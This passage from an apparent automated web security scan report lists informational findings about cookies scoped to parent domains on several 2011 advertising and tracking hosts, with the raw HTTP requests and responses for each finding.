Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pb_rtb_ev="1:535461.2925993182975414771.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: cw-app602
Cache-Control: no-cache, no-store
Set-Cookie: V=PpAVCxNh2PJr; Domain=.contextweb.com; Expires=Sat, 01-Sep-2012 14:16:01 GMT; Path=/
Set-Cookie: pb_rtb_ev="1:535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0"; Version=1; Domain=.contextweb.com; Max-Age=31536000; Expires=Thu, 06-Sep-2012 14:16:01 GMT; Path=/
Content-Type: image/gif
Date: Wed, 07 Sep 2011 14:16:01 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:38 GMT; path=/
ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=0000799975/size=728090/u=2/bnum=54069056/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=6F4E7BBBFD8CE677/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=ASf536a25b934d4dbabaaf671365070601/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:14:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:38 GMT; path=/
Set-Cookie: ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: 70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:38 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=0651551808&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=54069056=_
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:16:54 GMT; path=/
70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
54069056=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=0000799975/size=728090/u=2/bnum=68910242/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS072e9051ae61480d8af8a5a920c43596/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fweather.news.com.au%252Fwa%252Fperth%252Fperth HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:16:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:16:54 GMT; path=/
Set-Cookie: 70524729=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ASCID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: C2=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: F1=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: BASE=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: GUID=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: ROLL=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Set-Cookie: 54069056=DELETED; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:16:54 GMT
Content-Type: text/html; charset=utf-8
Cteonnt-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=8251023631&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=68910242=_
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bid.rb.ntc.ace.advertising.com
Path:	/site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:29 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site=0000799975/size=728090/u=2/bnum=70524729/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=3/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/rubcpmprice=01F5D655E2FFC4EB/istr=OTYwNDg0Ojc4OjA6MC4wMDA1ODQ2ODowLjAwMDU4NDY4OjAuMDAwNTg0Njg6MC4wMDA1NzMxODoxOjE6MC4wMDA1ODQ2ODowLjk3ODY0ODowLjAwMDUxMjg2NDY6MC4wMDA1ODkyODMzOjEzMTU0MDQwNjE6NTozOjEuMDIxMzUyOjAuMDAwNTEyODY0Ng/srcreq=8/bidtid=AS2463e9943a804387a72e0e9f481b7178/guidm=1007:n4tx19dbice3prpg7887b1ymgzfc6iit/dref=http%253A%252F%252Fwww.perthnow.com.au%252F HTTP/1.1
Host: bid.rb.ntc.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=optout!

Response

HTTP/1.1 200 OK
Cneonction: close
Date: Wed, 07 Sep 2011 14:14:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.960484.799975.0XMC
Set-Cookie: ACID=optout!; domain=advertising.com; expires=Tue, 07-Sep-2021 14:14:29 GMT; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Wed, 07 Sep 2011 14:14:29 GMT
Content-Type: text/html; charset=utf-8
ntCoent-Length: 581
Content-Length: 581

<script type="text/javascript" src="http://adfarm.mediaplex.com/ad/js/9608-119290-2042-5?mpt=1608123674&mpvc=http://bid.rb.ntc.ace.advertising.com/click/site=0000799975/mnum=0000960484/cstr=70524729=_
...[SNIP]...

8.9. http://cm.au.thewest.overture.com/js_flat_1_0/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cm.au.thewest.overture.com
Path:	/js_flat_1_0/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDEyNjEzNXc0cAN9RMwAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Sat, 04-Sep-2021 14:15:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js_flat_1_0/?config=6518910550&source=thewest_y7news_au_ctxt&type=thewest_y7news&ctxtId=thewest_y7news&mkt=au&maxCount=3&keywordCharEnc=UTF8&outputCharEnc=UTF8&ctxtUrl=http%3A%2F%2Fau.news.yahoo.com%2Fthewest%2Fa%2F-%2Fwa%2F10210782%2Fwildcats-abandon-bogut-for-nevill%2F HTTP/1.1
Host: cm.au.thewest.overture.com
Proxy-Connection: keep-alive
Referer: http://au.news.yahoo.com/thewest/a/-/wa/10210782/wildcats-abandon-bogut-for-nevill/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=228g5ih765ieg&b=3&s=bh; UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDYyNXQxMLAycAc8BMqgw=

Response

8.10. http://d7.zedo.com/bar/v16-504/d3/jsc/gl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-504/d3/jsc/gl.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

FFgeo=5386156;expires=Thu, 06 Sep 2012 14:14:20 GMT;domain=.zedo.com;path=/;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-504/d3/jsc/gl.js?k5xiThcyanucBq9IXvhSGSz5~090311 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V12F568CAD2J-573I706K63342132177B6AK63720K63690QK63352QQP0G00G0Q06E0F03A000059/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199; FFMChanCap=2457780B305,825#722607:767,4#789954|0,1#0,24:0,1#0,24; FFgeo=5386156; ZFFAbh=977B826,20|121_977#365; ZFFBbh=977B826,20|121_977#0; FFMCap=2457900B1185,234056,234851,234925:933,196008|0,1#0,24:0,1#0,24:0,1#0,24:0,1#0,24

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 399
Content-Type: application/x-javascript
Set-Cookie: FFgeo=5386156;expires=Thu, 06 Sep 2012 14:14:20 GMT;domain=.zedo.com;path=/;
ETag: "436874d-5d7-4aa4ddaecd340"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=25882
Expires: Wed, 07 Sep 2011 21:25:42 GMT
Date: Wed, 07 Sep 2011 14:14:20 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var zzl='en-US';

if(typeof zzGeo=='undefined'){
var zzGeo=254;}
if(typeof zzCountry=='undefined'){
var zzCountry=255;}
if(typeof
...[SNIP]...

8.11. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/130511/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=202013Ji03cHD3JhX00001N816qkP20GX142872422_84859000003JPq; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:14:18 GMT; Path=/servlet/ajrotator/track/pt63689

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/130511/0/vj?z=hpi&dim=63352&pos=1&pv=6402171833906324&nc=59081627&tz=300&url=http%3A%2F%2Fwww.perthnow.com.au%2F&refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dperth%2Bnews HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: ajess1_32177B6AC43D44C99988CDC0=a; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/
Set-Cookie: i=202013Ji03cHD3JhX00001N816qkP20GX142872422_84859000003JPq; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:14:18 GMT; Path=/servlet/ajrotator/track/pt63689
Set-Cookie: ajcmp=20236X0003BIY; Expires=Fri, 06-Sep-2013 14:14:18 GMT; Path=/
Content-Type: application/x-javascript
Content-Length: 378
Date: Wed, 07 Sep 2011 14:14:18 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/130511/0/cj/V128E2DB70EJ-573I706K6334213
...[SNIP]...

8.12. http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/vj previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hpi.rotator.hadj7.adjuggler.net
Path:	/servlet/ajrotator/80617/0/vj

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=202013Ji03PQd3JhX00001N816qkP20FX132910139_5124900003Djv; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:17:27 GMT; Path=/servlet/ajrotator/track/pt63689

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /servlet/ajrotator/80617/0/vj?z=hpi&dim=63352&pos=1&pv=6592370152939112&nc=20039895&tz=300&url=http%3A%2F%2Fwww.ntnews.com.au%2F&refer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dperth%2Bnews HTTP/1.1
Host: hpi.rotator.hadj7.adjuggler.net
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, no-store
Expires: Tue, 01 Jan 2000 00:00:00 GMT
P3P: policyref="http://hpi.rotator.hadj7.adjuggler.net:80/p3p/RotatorPolicyRef.xml", CP="NOI DSP COR CURa DEVa TAIa OUR SAMa NOR STP NAV STA LOC"
Set-Cookie: i=202013Ji03PQd3JhX00001N816qkP20FX132910139_5124900003Djv; Domain=.rotator.hadj7.adjuggler.net; Expires=Thu, 08-Sep-2011 14:17:27 GMT; Path=/servlet/ajrotator/track/pt63689
Content-Type: application/x-javascript
Content-Length: 377
Date: Wed, 07 Sep 2011 14:17:27 GMT
Connection: close

document.write("<"+"iframe src=\"http://d3.zedo.com/jsc/d3/ff2.html?n=1302;c=69;s=12;d=9;w=300;h=250;l=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/80617/0/cj/V121145851DJ-573I706K63342132
...[SNIP]...

8.13. http://i.w55c.net/a.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/a.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:06 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /a.gif?t=0&id=0RlCN4ZmQt0FXYalebQa&si=2995815&pcid=1027317&ei=RMX&ci=8998917&p=258&s=http%3A%2F%2Foptimized%2Dby%2Erubiconproject%2Ecom%2Fa%2F7856%2F12590%2F22893%2D15%2Ehtml%3Fcb%3D0%2E33166992268525064&reqid=1315404893&cat=32 HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?CY80ANBtDAAFUIkAAAAAABvfIgAAAAAAAgAIAAIAAAAAAP8AAAAECv9yGAAAAAAA9awPAAAAAABnti0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqcwYAAAAAAAIAAwAAAAAAqvHSTWKQ8j9xPQrXo3DzP6HTBjptoARAmpmZmZmZBUCh0wY6baAEQJqZmZmZmQVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABP8pWz3WCwCky7VqPoER8p2P8LgmYiHMJbwA-5AAAAAA==,,http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2F7856%2F12590%2F22893-15.html%3Fcb%3D0.33166992268525064,Z%3D300x250%26_salt%3D1434180912%26anmember%3D514%26anprice%3D%26keyword%3Dsmh%2Fnews_other%26r%3D0%26rf%3Dhttp%253A%2F%2Fnews.smh.com.au%2Fbreaking-news-national%2Fwa-labor-launches-another-bushfire-probe-20110907-1jx2h.html%26s%3D814544,c151e658-d95b-11e0-9465-78e7d15f7c8c
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:06 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:06 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.14. http://i.w55c.net/m.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/m.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:33 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /m.gif?id=8bb138bc0446417c9a4df9a0136d0caf8a93328592bf4d059bfc856c256fbc33&ei=ADBRITE&cver=1&euid=MTY4Mjk2NTQyeDAuMDk2IDEzMTQ4OTI0NTR4LTM2NTcxMDg5MQ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://cti.w55c.net/ct/cms-2-frame.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchrubicon=1; matchbluekai=1; matchaccuen=1; matchadmeld=1; optout=1; matchpubmatic=1; wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:33 GMT
Server: Jetty(6.1.22)
Set-Cookie: wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:33 GMT
Cache-Control: no-store
Content-Length: 42
content-type: image/gif
X-Powered-By: Mirror Image Internet
P3P: CP="NOI DSP COR NID"
Via: 1.1 bfi061004 (MII-APC/2.1)

GIF89a.............!.......,........@..D.;

8.15. http://i.w55c.net/m_yahoo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/m_yahoo.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F82e0303e4a9098b0c77927fc;Path=/;Domain=.w55c.net;Expires=Fri, 06-Sep-13 14:16:44 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

